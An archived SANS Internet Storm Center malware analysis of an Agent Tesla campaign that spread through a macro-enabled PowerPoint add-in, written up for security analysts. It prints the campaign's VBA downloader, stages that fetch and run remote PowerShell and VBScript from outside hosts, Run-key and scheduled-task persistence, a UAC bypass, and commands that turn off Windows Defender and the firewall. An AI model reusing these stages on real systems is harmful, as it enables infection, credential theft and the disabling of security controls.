{
	"id": "591b28b9-ff82-4aff-8bb4-929c312e312e",
	"created_at": "2026-04-06T00:17:17.361394Z",
	"updated_at": "2026-04-10T03:20:32.757403Z",
	"deleted_at": null,
	"sha1_hash": "c40fd07268ced16f98e70ea1ade9aa50ffc0ae9e",
	"title": "PowerPoint attachments, Agent Tesla and code reuse in malware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 697969,
	"plain_text": "PowerPoint attachments, Agent Tesla and code reuse in malware\r\nBy SANS Internet Storm Center\r\nArchived: 2026-04-05 12:58:15 UTC\r\nSince any Office document that may contain macros can potentially be used by malware authors with similar results as the usual Excel spreadsheet with macros, threat actors have most probably utilized all of the available macro-enabled Office formats for attacks at some point. However, since most users would probably view a PowerPoint slideshow asking them to enable macros with a not insignificant level of suspicion, most attackers tend not to use any of the PowerPoint file formats at all.\r\nOver the past few months, I have nevertheless noticed an unusual increase in the number of malicious PowerPoint attachments caught in my (mal)spam trap. Although the use of malicious PowerPoint is nothing new[1], given the reasons mentioned above, it has never been too common, so I thought it might be worthwhile to take a look at an example of a recent malspam campaign that spread the Agent Tesla infostealer using a macro-enabled PowerPoint file.\r\nThe file in question was named SKM-03753WIRE23560USD.ppam and was distributed as an attachment of an e-mail that tried to make it appear as a wire transfer receipt.\r\nhttps://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/\r\nPage 1 of 10\n\nYou may have noticed that the filename ended in an unusual extension, PPAM. This extension is used for PowerPoint Add-ins with macros[2], a special format for extending the functionality of PowerPoint presentations. Although there are some differences in content between PPAM and the more usual PPTM files, these don’t concern macros. 
Therefore, if we only care about the embedded VBA code, as in this instance, we may analyze a PPAM using oledump[3], or any other tool we would normally use to parse macro-enabled Office documents.\r\nIn this instance, the file turned out to contain only one small, slightly obfuscated VBA script:\r\nSub Auto_Open()\r\nSet Outlook = CreateObject(yOCaKOVzT(\"V|{svvr5Hwwspjh{pvu\", \"7\"))\r\nSet Microsoft = Outlook.CreateObject(yOCaKOVzT(\"^zjypw{5Zolss\", \"7\"))\r\nSet MicrosoftExec = Microsoft.Exec(yOCaKOVzT(\"rqygt\", \"2\") + yOCaKOVzT(\"ynkrr4k~k\u0026\", \"6\") + Chr(150) + yOCaKOVzT\r\nMsgBox (MicrosoftExec.StdOut.ReadAll)\r\nEnd Sub\r\nPublic Function yOCaKOVzT(dghKkkXkS As String, NdffEcveP As Integer)\r\n Dim Pp6IFCPL9 As Integer\r\n For Pp6IFCPL9 = 1 To Len(dghKkkXkS)\r\nDim tHvckljoMTaERQgkne As Boolean\r\n Mid(dghKkkXkS, Pp6IFCPL9, 1) = Chr(Asc(Mid(dghKkkXkS, Pp6IFCPL9, 1)) - NdffEcveP)\r\n Next Pp6IFCPL9\r\nDim TMydgBdhyraoOOowKm As Byte\r\n yOCaKOVzT = dghKkkXkS\r\nEnd Function\r\nSince the function yOCaKOVzT only subtracts the value provided in the second argument from each byte in the string provided as the first argument, deobfuscation of the script is fairly straightforward and leads to the following code.\r\nSub Auto_Open()\r\nSet Outlook = CreateObject(\"Outlook.Application\")\r\nSet Microsoft = Outlook.CreateObject(\"Microsoft = Wscript.Shell\")\r\nSet MicrosoftExec = Microsoft.Exec(\"MicrosoftExec = powershell.exe -WindowStyle Hidden -c c:\\windows\\sy\r\nMsgBox (MicrosoftExec.StdOut.ReadAll)\r\nEnd Sub\r\nAs we may see, the VBA script is a simple downloader that is supposed to execute PowerShell code, which will grab a file from hxxps://j[.]mp/chrehghghghghghghghghghcre (which redirects to hxxps://download2389.mediafire[.]com/ya9tv6zqa1zg/95ggilwnqccbq6l/20.doc) and execute it using the Microsoft HTML 
Application host (MSHTA).\r\nAfter cleaning the downloaded file 20.doc up a bit, it came down to the following VBScript:\r\npink = \"pOwersHelL.exe -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('hxxps://8db3b91a-ea93-419b-b51b-0\r\ni'E'x(iwr('hxxps://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles[.]com/ugd/8db3b9_92ec48660f134f3bb502662383ca4f\r\nConst tpok = \u0026H80000001\r\nlopaskkk = \".\"\r\nSet kasodkmwm = GetObject(\"winmgmts:\\\\\" \u0026 lopaskkk \u0026 \"\\root\\default:StdRegProv\")\r\npoloaosd = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"\r\nakosdwdjdw = \"cjjhkloggw\"\r\nkasodkmwm.SetStringValue tpok, poloaosd, akosdwdjdw, pink\r\nset MicrosoftWINdows = GetObject(StrReverse(\"B0A85DF40C00-9BDA-0D11-0FC1-22CD539F:wen\"))\r\nMicrosoftWINdows _\r\n. _\r\nRUn _\r\npink,0\r\nargs = \"/create /sc MINUTE /mo 63 /tn \"\"\"\"kbnvmmmhjo\"\"\"\" /\" \u0026 _\r\n\"F /tr \"\"\"\"\\\"\"\"\"M\" \u0026 \"s\" \u0026 \"H\" \u0026 \"t\" \u0026 \"A\"\"\"\"\\\"\"\"\"hxxps://kukadunikkk@kdaoskdokaodkwldld.blogspot[.]com/p/20.htm\r\nhxxps://kukadunikkk@kdaoskdokaodkwldld.blogspot[.]com/p/20.html\r\n[code omitted]\r\nmagolia = \".\"\r\nSet Pologachi = GetObject(\"winmgmts:\\\\\" \u0026 magolia \u0026 \"\\root\\default:StdRegProv\")\r\nthreefifty = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"\r\nMagachuchugaga = \"pilodkis\"\r\npathanogalulu = calc \"\"\"hxxp://www.starinxxxgkular.duckdns[.]org/s1/20.txt\"\"\"\r\nPologachi.SetStringValue halaluya, threefifty, Magachuchugaga, pathanogalulu\r\n[code omitted]\r\nGoing down from the top, the script is supposed to:\r\n1. Download and execute two files containing PowerShell script from usrfiles.com (we’ll look at those in a moment).\r\n2. Ensure persistence using the registry Run key by creating a value containing the same PowerShell script as mentioned in 1. 
It also created another value in the same key, which was supposed to run a file from http[:]//www.starinxxxgkular.duckdns[.]org using MSHTA (although the link was already dead at the time of the analysis, it may be reasonably assumed that this was supposed to be an additional persistence mechanism).\r\n3. Ensure persistence using a Scheduled Task named kbnvmmmhjo, which was supposed to run a file using MSHTA from hxxps://kdaoskdokaodkwldld.blogspot[.]com.\r\nThe first PowerShell script mentioned above was lightly obfuscated and contained what we may think of as the “main payload” – two GunZipped PE files in separate byte arrays (an “injector” and the actual Agent Tesla executable) and the code to decompress them and use the “injector” in the second byte array to execute the main Agent Tesla file. The following code is a portion of its deobfuscated content:\r\n[byte[]] $byteArray1 = @(31,139,...,94,3,0)\r\n[byte[]] $byteArray2 =@(31,139,...,228,0,0)\r\n[byte[]] $decompressedArray1 = Get-DecompressedByteArray $byteArray1\r\n[byte[]] $decompressedArray2 = Get-DecompressedByteArray $byteArray2\r\n[Reflection.Assembly]::Load($decompressedArray2).GetType('projFUD.PA').GetMethod('Execute').Invoke($null,[object\r\nBoth of the executables were written in .NET (as is usual for Agent Tesla) and both were fairly heavily obfuscated, as you may see from the following images.\r\nInjector code – the Execute method\r\nExcerpt from the list of methods in the Agent Tesla executable\r\nNevertheless, with a little bit of deobfuscation, it is possible to see that the injector is supposed to inject the Agent Tesla code into the hollowed-out aspnet_compiler.exe process (a technique which Agent Tesla has been known 
to use[4]). And even without understanding the names of methods and variables in the main Agent Tesla code, some portions of it are fairly clear, such as the following excerpt from the key-logging method.\r\nThe last file we didn’t take a closer look at was the second PowerShell script downloaded by the second stage of the infection chain.\r\n$down = New-Object System.Net.WebClient\r\n$url = 'hxxps://raw.githubusercontent[.]com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe';\r\n$file = 'C:\\Users\\Public\\NSudo.exe';\r\n$down.DownloadFile($url,$file);\r\n$kasodkaosd = New-Object System.Net.WebClient\r\n$kasodkaosdsdmaowdk = 'hxxps://www.mediafire[.]com/file/qh5j3uy8qo8cpu7/FINAL+MAIN+vbs+-+Copy.vbs/file';\r\n$kasdjwkdo = 'C:\\Users\\Public\\heheheheh.vbs';\r\n$kasodkaosd.DownloadFile($kasodkaosdsdmaowdk,$kasdjwkdo);\r\nFunction script:Set-INFFile {\r\n[CmdletBinding()]\r\nParam (\r\n[Parameter(HelpMessage=\"Specify the INF file location\")]\r\n$InfFileLocation = \"$env:temp\\CMSTP.inf\",\r\n[Parameter(HelpMessage=\"Specify the command to launch in a UAC-privileged window\")]\r\n[String]$CommandToExecute = 'wscript.exe C:\\Users\\Public\\heheheheh.vbs'\r\n)\r\n [code omitted]\r\nSince this script is only slightly obfuscated, we may clearly see that it is supposed to download NSudo[5] (a privilege escalation utility) and a VBS file hosted on mediafire.com, which it is then supposed to execute using WScript.\r\nThis final VBS is not obfuscated at all, and it can be clearly seen that it is basically supposed to disable the anti-malware protection with (among other techniques) the use of the NSudo tool which was previously downloaded.\r\n[code omitted]\r\nSet objShell = 
CreateObject(\"Wscript.Shell\")\r\nobjShell.Run \"C:\\Users\\Public\\NSudo.exe -U:T -ShowWindowMode:Hide sc delete windefend\"\r\n[code omitted]\r\noutputMessage(\"Add-MpPreference -ExclusionProcess powershell.exe\")\r\noutputMessage(\"Add-MpPreference -ExclusionProcess mshta.exe\")\r\noutputMessage(\"Add-MpPreference -ExclusionProcess cmd.exe\")\r\noutputMessage(\"Add-MpPreference -ExclusionProcess wscript.exe\")\r\noutputMessage(\"Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRea\r\n[code omitted]\r\noutputMessage(\"netsh advfirewall set allprofiles state off\")\r\noutputMessage(\"Stop-Service -Name WinDefend -Confirm:$false -Force\")\r\noutputMessage(\"Set-Service -Name WinDefend -StartupType Disabled\")\r\noutputMessage(\"sc delete windefend\")\r\nSub outputMessage(byval args)\r\n[code omitted]\r\nerrReturn = objProcess.Create( \"powershell \" + args, null, objConfig, intProcessID)\r\nEnd Sub\r\nAs we may see from the following diagram, the very simple macro which was contained in the PPAM file led to a fairly complex infection chain in the end…\r\nThis is not the end of the story, however, since one additional point which deserves a small mention is the reuse of open-source code in the infection chain.\r\nAlthough reuse of code from GitHub or StackOverflow is ubiquitous among legitimate developers and malware authors alike, in this case, unmodified “borrowed” code was used quite heavily. For example, the GunZip algorithm used by the third (PowerShell) stage was taken from GitHub, as was a UAC bypass used to execute the final VBS script[6]. 
Since in both of these instances the foreign code made up a significant portion of the analyzed file, not having to examine it too deeply sped up the entire analysis greatly.\r\nTherefore, I will offer one piece of parting advice, which can be especially useful to any junior security analysts out there. If you ever see a line in malicious code that doesn’t seem to belong there (e.g., a call to a function which is supposed to display a visible error message to the user), try asking Google whether it hasn’t seen it somewhere else. In some cases you will come up empty, as such code might have been included on purpose by the malware author in an attempt to obfuscate the real functionality of the program; in other instances, however, you may find that a significant portion of the code in front of you has been reused, and you might not have to spend time going into it any deeper than is needed to gather a basic understanding of its main function.\r\nIndicators of Compromise (IoCs)\r\n[1] https://blog.nviso.eu/2017/06/07/malicious-powerpoint-documents-abusing-mouse-over-actions/\r\n[2] https://fileinfo.com/extension/ppam\r\n[3] https://blog.didierstevens.com/programs/oledump-py/\r\n[4] https://www.fortinet.com/blog/threat-research/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\r\n[5] https://github.com/m2team/NSudo\r\n[6] https://github.com/tylerapplebaum/CMSTP-UACBypass/blob/master/UACBypassCMSTP.ps1\r\n-----------\r\nJan Kopriva\r\n@jk0pr\r\nAlef Nula\r\nSource: https://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://isc.sans.edu/forums/diary/PowerPoint+attachments+Agent+Tesla+and+code+reuse+in+malware/28154/"
	],
	"report_names": [
		"28154"
	],
	"threat_actors": [],
	"ts_created_at": 1775434637,
	"ts_updated_at": 1775791232,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c40fd07268ced16f98e70ea1ade9aa50ffc0ae9e.pdf",
		"text": "https://archive.orkl.eu/c40fd07268ced16f98e70ea1ade9aa50ffc0ae9e.txt",
		"img": "https://archive.orkl.eu/c40fd07268ced16f98e70ea1ade9aa50ffc0ae9e.jpg"
	}
}